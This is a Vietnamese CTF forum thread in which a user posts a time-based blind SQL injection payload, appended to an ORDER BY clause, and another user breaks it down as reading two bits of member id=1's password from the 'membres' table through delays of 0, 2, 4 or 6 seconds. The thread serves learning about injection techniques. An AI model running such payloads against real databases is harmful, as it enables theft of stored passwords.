SQL help

Thảo luận trong 'Thảo luận các cuộc thi CTF khác' bắt đầu bởi yuanctf, 16/11/16, 11:11 PM.

  1. yuanctf

    yuanctf Wh------

    Tham gia: 28/08/16, 10:08 PM
    Bài viết: 10
    Đã được thích: 4
    Điểm thành tích:
    8
    Có một bài, nhờ mọi người giải thích giúp mình giải thích mấy câu truy vấn này được không ạ?. Mình cảm ơn!
    ASC,(select (case field(concat(substring(bin(ascii(substring(password,1,1))),1,1),substring(bin(ascii(substring(password,1,1))),2,1)),concat(char(48),char(48)),concat(char(48),char(49)),concat(char(49),char(48)),concat(char(49),char(49)))when 1 then TRUE when 2 then sleep(2) when 3 then sleep(4) when 4 then sleep(6) end) from membres where id=1)
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. avnh

    avnh W-------

    Tham gia: 28/04/16, 02:04 PM
    Bài viết: 10
    Đã được thích: 5
    Điểm thành tích:
    8
    theo mình nghĩ thì
    chia ra như này dễ nhìn hơn bạn ạ

    ASC,
    (select (case
    field(
    concat(
    substring(bin(ascii(substring(password,1,1))),1,1),
    substring(bin(ascii(substring(password,1,1))),2,1)
    )
    ,
    concat(char(48),char(48))
    ,
    concat(char(48),char(49))
    ,
    concat(char(49),char(48))
    ,
    concat (char(49),char(49)))
    when 1 then TRUE
    when 2 then sleep(2)
    when 3 then sleep(4)
    when 4 then sleep(6) end)

    from membres where id=1)

    theo minh thì có thể giải thích như này:
    - ASC: cái này chắc bạn copy thừ từ câu truy vấn trước
    - case ... when: cái này như là switch/case trong C vậy
    - field(sstr, str1,str2...): so sánh xâu sstr llần lượt với các xâu str1, str2 nếu gặp xâu giống sẽ trả về vị trí cửa xâu trùng
    - concat: nối xâu
    - substr : lấy xâu con

    câu lệnh này là lấy 2 bit của password của memmber id=1, nếu ko sleep thì 2 bit là 00, sleep(2) là 01 và vvvvv..
    Goodluck!
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. hunganh1803

    hunganh1803 W-------

    Tham gia: 24/06/15, 01:06 AM
    Bài viết: 5
    Đã được thích: 6
    Điểm thành tích:
    8
    Cảm ơn bạn avnh !
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan